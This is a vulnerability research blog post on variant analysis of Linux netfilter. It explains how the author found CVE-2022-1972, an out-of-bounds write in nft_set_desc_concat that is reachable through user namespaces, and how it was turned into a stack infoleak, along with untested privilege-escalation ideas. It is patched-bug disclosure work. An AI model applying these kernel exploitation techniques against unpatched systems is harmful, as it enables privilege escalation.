This year, I have done my end-of-study internship at Randorisec, the original purpose of my internship was to study different ways of doing variant analysis on open-sources project but also on closed-source software solutions. The Linux kernel is an attractive target, and so it was chosen as the target of my project. I started scouting for publicly disclosed bugs which could lead to interesting variant patterns. Since the beginning of the year, several bugs have been found and fixed within the kernel component netfilter, such has CVE 2022-1015. In this article, I am going to talk about two bugs I’ve found inside the netfilter kernel section. One of them lead to information leakage, and potentially to a fully functional local privilege escalation (LPE) exploit.
A brief introduction to netfilter
Netfilter is an open-source project that is used to perform packet filtering, aka the linux firewall.
This project is often mentioned iptables which is the userland application used to configure your firewall.
In 2014, a new subsystem was added to the netfilter firewall, called nftable
, which is now configured through the nftables userland application.
The core logic of netfilter is implemented within the kernel (/net/netfilter
), and the userland tools communicate with it via netlink messages.
A VERY basic usage
The main purpose of netfilter is the table object.
This object will contain all the information about a filter.
The following nftables
command creates a new table that is named my-table
that could be used as a filter on the IP protocol.
nft> add table ip my-table
A table can contain different object such as sets, that is used to store data.
The following command create a new set associated to the table my-table
named my-set
that stores IPv4 addresses.
nft> add set ip my-table my-set {type: ipv4_addr;}
Finally, we can create chains of rules that would be applied on the received packet.
Starting point
On April 2022, David Bouman released an article about vulnerabilities within the Linux kernel.
I focused my interest on the CVE-2022-1015, as it is the target of my variant analysis.
This vulnerability is very interesting because some of the out-of-bound vulnerabilities happen because the user input checks are not well implemented.
Moreover, this kind of bugs can be found both in the Linux kernel and in userland applications.
The bug associated to this vulnerability is an integer overflow located into the function nft_validate_register_load
(/net/netfilter/nf_tables_api.c
) at (0)
.
static int nft_validate_register_load(enum nft_registers reg, unsigned int len)
{
if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
return -EINVAL;
if (len == 0)
return -EINVAL;
if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data)) <===== (0)
return -ERANGE;
return 0;
}
After reading and understanding how this vulnerability works, I decided to write a CodeQL query able to find such a vulnerability. The analysis of the different results of the query led to several candidates for CVE-2022-1015 variant.
CVE-2022-1015 variant
The bug
One of these candidates hold my attention, it is located inside the function nft_set_desc_concat_parse
(/net/netfilter/nf_tables_api.c
).
static int nft_set_desc_concat_parse(const struct nlattr *attr,
struct nft_set_desc *desc)
{
struct nlattr *tb[NFTA_SET_FIELD_MAX + 1];
u32 len;
int err;
err = nla_parse_nested_deprecated(tb, NFTA_SET_FIELD_MAX, attr,
nft_concat_policy, NULL);
if (err < 0)
return err;
if (!tb[NFTA_SET_FIELD_LEN])
return -EINVAL;
len = ntohl(nla_get_be32(tb[NFTA_SET_FIELD_LEN]));
if (len * BITS_PER_BYTE / 32 > NFT_REG32_COUNT) <===== (1)
return -E2BIG;
desc->field_len[desc->field_count++] = len; <===== (2)
return 0;
}
At (1)
, we discern the pattern which matched the query.
Let’s focus on the left part of the comparison len * BITS_PER_BYTE / 32
.
len
is a 32 bits integer extracted from a netlink message with nla_get_be32
, so we can assume that this is user controlable.
The macro BITS_PER_BYTE
is defined in /include/linux/bits.h
.
#define BITS_PER_BYTE 8
The multiplication len * BITS_PER_BYTE
will result in left shift of three bits.
The next arithmetic operation is the division with 32, which will result in a right shift of five bits.
We understand that five bits of len
are ignored, the three most significant and the two less significant.
Now, let’s have look to the right side of the comparison.
The macro NFT_REG32_COUNT
is defined in the file /include/uapi/linux/netfilter/nf_tables.h
.
enum nft_registers {
...
NFT_REG32_00 = 8,
NFT_REG32_01,
NFT_REG32_02,
NFT_REG32_03,
NFT_REG32_04,
NFT_REG32_05,
NFT_REG32_06,
NFT_REG32_07,
NFT_REG32_08,
NFT_REG32_09,
NFT_REG32_10,
NFT_REG32_11,
NFT_REG32_12,
NFT_REG32_13,
NFT_REG32_14,
NFT_REG32_15,
};
...
#define NFT_REG32_COUNT (NFT_REG32_15 - NFT_REG32_00 + 1)
We have NFT_REG32_COUNT
equal to 23 - 8 + 1 = 16
.
If we invert the condition at (1)
in order to get a condition on len
, we get len < 64
.
Nevertheless, in this comparison five bits are ignored, so this five bits could be used to store an unwanted value at (2)
.
The next step is to find a way for a random unprivileged user to reach this buggy code.
Unprivileged access
The kernel netfilter module can be accessed from a netlink defined in /net/netfilter/nfnetlink.c
.
static int __net_init nfnetlink_net_init(struct net *net)
{
struct nfnl_net *nfnlnet = nfnl_pernet(net);
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
.input = nfnetlink_rcv, <===== (3)
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind,
#endif
};
nfnlnet->nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnlnet->nfnl)
return -ENOMEM;
return 0;
}
The input
field of the structure netlink_kernel_cfg
at (3)
gives us the function that will be called when a message is received via the netfilter netlink.
Let’s have a look to this handler.
static void nfnetlink_rcv(struct sk_buff *skb)
{
struct nlmsghdr *nlh = nlmsg_hdr(skb);
if (skb->len < NLMSG_HDRLEN ||
nlh->nlmsg_len < NLMSG_HDRLEN ||
skb->len < nlh->nlmsg_len)
return;
if (!netlink_net_capable(skb, CAP_NET_ADMIN)) { <===== (4)
netlink_ack(skb, nlh, -EPERM, NULL);
return;
}
if (nlh->nlmsg_type == NFNL_MSG_BATCH_BEGIN)
nfnetlink_rcv_skb_batch(skb, nlh);
else
netlink_rcv_skb(skb, nfnetlink_rcv_msg);
}
We see a capability check at (4)
done by the function netlink_net_capable
, it’s mandatory that the user have the CAP_NET_ADMIN
capabilities to use netfilter.
Luckily for us, this capability could be acquired with user namespaces (CONFIG_USER_NS
).
User namespace have been a game changer those past few years in Linux kernel exploitation, they’ve opened a new set of attack surfaces.
This is kind of funny, because they are also used to sandbox applications, a good example of double-edged sword.
Let’s get back to our topic, we can map the call path from nfnetlink_rcv
to nft_set_desc_concat_parse
as the following.
nfnetlink_rcv
nfnetlink_rcv_skb_batch
nfnetlink_rcv_batch
nf_tables_newset
nf_tables_set_desc_parse
nft_set_desc_concat
nft_set_desc_concat_parse
There is not any relevant information within the intermediate functions, so we are going to ignore them for the moment.
If the kernel is compiled with CONFIG_USER_NS
enabled, we will be able to reach our vulnerable code path.
Well, what can we do?
Sadly, it seems that this bug didn’t have any impact on the linux security.
Indeed, the assignment at (2)
is hiding a cast from 32 bits unsigned integer into a 8 bits one, because the field field_len
of the nft_set_desc
structure is of type u8
.
struct nft_set_desc {
unsigned int klen;
unsigned int dlen;
unsigned int size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
bool expr;
};
It reduces a lot the power of this overflow as the two less significant bits can’t be used.
A strange neighbor
However, this is not the end of the adventure.
When I was looking to exploit the previous bug, something halted me: there was no checks on the index field_count
before the assignment at (2)
.
The parent function of nft_set_desc_concat_parse
is nft_set_desc_concat
(/net/netfilter/nf_tables_api.c
).
static int nft_set_desc_concat(struct nft_set_desc *desc,
const struct nlattr *nla)
{
struct nlattr *attr;
int rem, err;
nla_for_each_nested(attr, nla, rem) { <===== (5)
if (nla_type(attr) != NFTA_LIST_ELEM)
return -EINVAL;
err = nft_set_desc_concat_parse(attr, desc); <===== (6)
if (err < 0)
return err;
}
return 0;
}
The call to nft_set_desc_concat_parse
is done at (6)
but the most interesting thing is that the call is located in a loop that starts at (5)
, and there is not any verification in the body loop on the value of desc->field_count
.
nla_for_each_nested
will loop over all the netlink attributes provided by the user, if the user provides more than NFT_REG32_COUNT
, a buffer overflow will happen.
Gimme gimme gimme an infoleak …
We will see how to turn this buffer overflow into a kernel infoleak.
The first byte that will be overflown is the field field_count
that stored the number of elements stored into the field field_len
.
We will use this field to reach our goal.
Netfilter sets
We will use the netfilter sets, represented by the structure nft_set
(/include/net/netfilter/nf_tables.h
).
struct nft_set {
struct list_head list;
struct list_head bindings;
struct nft_table *table;
possible_net_t net;
char *name;
u64 handle;
u32 ktype;
u32 dtype;
u32 objtype;
u32 size;
u8 field_len[NFT_REG32_COUNT];
u8 field_count;
u32 use;
atomic_t nelems;
u32 ndeact;
u64 timeout;
u32 gc_int;
u16 policy;
u16 udlen;
unsigned char *udata;
/* runtime data below here */
const struct nft_set_ops *ops ____cacheline_aligned;
u16 flags:14,
genmask:2;
u8 klen;
u8 dlen;
u8 num_exprs;
struct nft_expr *exprs[NFT_SET_EXPR_MAX];
struct list_head catchall_list;
unsigned char data[]
__attribute__((aligned(__alignof__(u64))));
};
This sets are allocated into the function nf_tables_newset
(/net/netfilter/nf_tables_api.c
) that is a parent of the vulnerable function nft_set_desc_concat_parse
.
static int nf_tables_newset(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
const struct nft_set_ops *ops;
struct nft_set_desc desc;
struct nft_set *set;
size_t alloc_size;
u64 size;
...
memset(&desc, 0, sizeof(desc)); <===== (7)
...
if (nla[NFTA_SET_DESC] != NULL) {
err = nf_tables_set_desc_parse(&desc, nla[NFTA_SET_DESC]); <===== (8)
if (err < 0)
return err;
}
...
size = 0;
if (ops->privsize != NULL)
size = ops->privsize(nla, &desc);
alloc_size = sizeof(*set) + size + udlen;
if (alloc_size < size || alloc_size > INT_MAX)
return -ENOMEM;
set = kvzalloc(alloc_size, GFP_KERNEL); <===== (9)
if (!set)
return -ENOMEM;
...
set->field_count = desc.field_count;
for (i = 0; i < desc.field_count; i++) <===== (10)
set->field_len[i] = desc.field_len[i];
...
}
We retrieve at (8)
the call that leads to the vulnerable function.
Its first argument is the address of the local variable desc
, that is initialized at (7)
.
This is the object that will be modified into the function nft_set_desc_concat_parse
.
We can see that its fields field_count
and field_len
are used at (10)
and they are stored into the freshly allocated nft_set
(9)
.
So, if the out-of-bound has been used to override solely the field field_len
of desc
with a value bigger than 20 (end of the structure + alignment), some data from the stack will be copied into the nft_set
structure at (10)
.
It will also, in this case, produce an out-of-bound into the nft_set
structure, but it won’t be useful for our leak.
Back to the userland
The next step is to find a way to send back this information to userland.
In order to do so, we will use the function nf_tables_getset
(/net/netfilter/nf_tables_api.c
) that can be reached in a similar way of nf_tables_newset
.
nf_tables_getset
can be used to retrieve information about a registered set.
tatic int nf_tables_getset(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
const struct nft_set *set;
struct sk_buff *skb2;
struct nft_ctx ctx;
int err;
...
skb2 = alloc_skb(NLMSG_GOODSIZE, GFP_ATOMIC);
if (skb2 == NULL)
return -ENOMEM;
err = nf_tables_fill_set(skb2, &ctx, set, NFT_MSG_NEWSET, 0); <===== (11)
if (err < 0)
goto err_fill_set_info;
return nfnetlink_unicast(skb2, net, NETLINK_CB(skb).portid); <===== (12)
}
This function will send data to userland through the netfilter netlink thanks to nfnetlink_unicast
at (12)
and this data will be setup into the call to nf_tables_fill_set
(/net/netfilter/nf_tables_api.c
).
static int nf_tables_fill_set(struct sk_buff *skb, const struct nft_ctx *ctx,
const struct nft_set *set, u16 event, u16 flags)
{
struct nlmsghdr *nlh;
u32 portid = ctx->portid;
struct nlattr *nest;
u32 seq = ctx->seq;
int i;
event = nfnl_msg_type(NFNL_SUBSYS_NFTABLES, event);
nlh = nfnl_msg_put(skb, portid, seq, event, flags, ctx->family,
NFNETLINK_V0, nft_base_seq(ctx->net));
...
if (set->udata &&
nla_put(skb, NFTA_SET_USERDATA, set->udlen, set->udata))
goto nla_put_failure;
...
if (set->field_count > 1 &&
nf_tables_fill_set_concat(skb, set)) <===== (13)
goto nla_put_failure;
...
nlmsg_end(skb, nlh);
return 0;
nla_put_failure:
nlmsg_trim(skb, nlh);
return -1;
}
At (13)
, an other auxiliary function is used to manage data concerning the fields field_len
and field_count
of the nft_set
structure.
static int nf_tables_fill_set_concat(struct sk_buff *skb,
const struct nft_set *set)
{
struct nlattr *concat, *field;
int i;
concat = nla_nest_start_noflag(skb, NFTA_SET_DESC_CONCAT);
if (!concat)
return -ENOMEM;
for (i = 0; i < set->field_count; i++) { <===== (14)
field = nla_nest_start_noflag(skb, NFTA_LIST_ELEM);
if (!field)
return -ENOMEM;
if (nla_put_be32(skb, NFTA_SET_FIELD_LEN, <===== (15)
htonl(set->field_len[i])))
return -ENOMEM;
nla_nest_end(skb, field);
}
nla_nest_end(skb, concat);
return 0;
}
As we can see at (14)
, we will iterate set->field_count
times, and at each iteration, one element of the set->field_len
buffer will be added to the socket buffer at (15)
.
So if the off-by-one has been produced at (2)
as explained previously, information stored into the stack will be copied into the heap at (10)
and finally, the user will be able to access them thanks to sockets.
This leak is the result of my PoC. We can observe that it allows, in these specific circumstances, to leak a stack canary and an address of the data section.
Limitations
We have seen that the out-of-bound can lead to an infoleak, however this leak is not so powerful because it is restricted to 28 bytes due to the organization of the nft_set
structure.
Indeed, if we want a bigger leak, it requires to overwrite the least significant bytes of the field udata
, and it can lead to segmentation fault in the nf_tables_fill_set
function.
Moreover, the leak is dependent on the stack organization which is itself dependent on the compilation, so this leak can provide interesting information on a specific kernel but could also be useless on the next version.
Remediation
I didn’t manage to turn this out-of-bound into a fully functional LPE exploit before it was publicly disclosed and fixed. It has been fixed on the 31st may 2022 by the commit fecf31ee395b0295f2d7260aa29946b7605f7c85. This commit is fixing both the integer overflow and the out-of-bound. The patch of the integer overflow allows to have a length up to 255, that will had facilitated the exploitation of the vulnerability.
This vulnerability has been officially disclosed on oss-security, and the CVE-2022-1972 has been assigned to this vulnerability.
Say LPE again! I dare you!
The nft_set
structure stores several pointers, making it a good place to start.
The field udata
stores the address at the end of the structure, address of the field data
.
If some data are stored into the field data
, the number of stored bytes into this field is stored in the udlen
field.
The write primitive allows to overwrite this field, which could lead to an heap infoleak.
From this leak, we can imagine being able to get some pointers from different caches.
We can also try to have a random free primitive with an overflow that reaches the field num_exprs
of the structure nft_set
and set a bigger value than 5 (NFT_SET_EXPR_MAX = 2
).
As a result, a part of the field data
will also be considered as part as the field exprs
, and we are going to obtain a full control over the stored exprs
.
We just have to find a way to call nft_expr_destroy
.
So as to do that, we may try to produce an error inside the management of the expression, just after the out-of-bound inside the nft_set
structure.
By combining these techniques, we should be able to get a random free primitive and try to produce use-after-free.
All of this is a hypothesis as it has not been tested, so it may or may not work.
Conclusion
To sum-up, I found two bugs within the kernel portion of netfilter which lead to a 28 bytes infoleak. These bugs could not be exploited to obtain a privilege escalation due to a lack of time and weak write primitive (bytes should be lower than 67). All the sources of my poc can be found on our GitHub.